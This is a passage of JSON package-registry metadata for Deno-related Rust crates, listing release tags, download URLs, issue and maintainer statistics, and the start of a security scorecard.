ts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T17:16:19.490Z","dependent_packages_count":0,"downloads":4257,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.80213430811862,"dependent_repos_count":24.302222746300338,"dependent_packages_count":32.233948470019456,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.77943517481281},"purl":"pkg:cargo/deno_permissions_extended","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_permissions_extended","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_permissions_extended","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_permissions_extended/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_permissions_extended/codemeta","maintainers":[{"uuid":"300816","login":"carloslfu","name":"Carlos Galarza","email":null,"url":"https://github.com/carloslfu","packages_count":8,"html_url":"https://crates.io/users/carloslfu","role":null,"created_at":"2024-11-29T00:47:08.270Z","updated_at":"2024-11-29T00:47:08.270Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/carloslfu/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047103,"name":"deno_cli_snapshots","ecosystem":"cargo","description":"Provides snapshots for the deno CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":8,"first_release_published_at":"2019-08-20T02:38:02.450Z","latest_release_published_at":"2019-09-25T23:47:22.019Z","latest_release_number":"0.19.0","last_synced_at":"2026-08-29T21:56:58.972Z","created_at":"2022-04-12T09:58:21.922Z","updated_at":"2026-08-29T21:56:58.973Z","registry_url":"https://crates.io/crates/deno_cli_snapshots/","install_command":"cargo install deno_cli_snapshots","documentation_url":"https://docs.rs/deno_cli_snapshots/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are 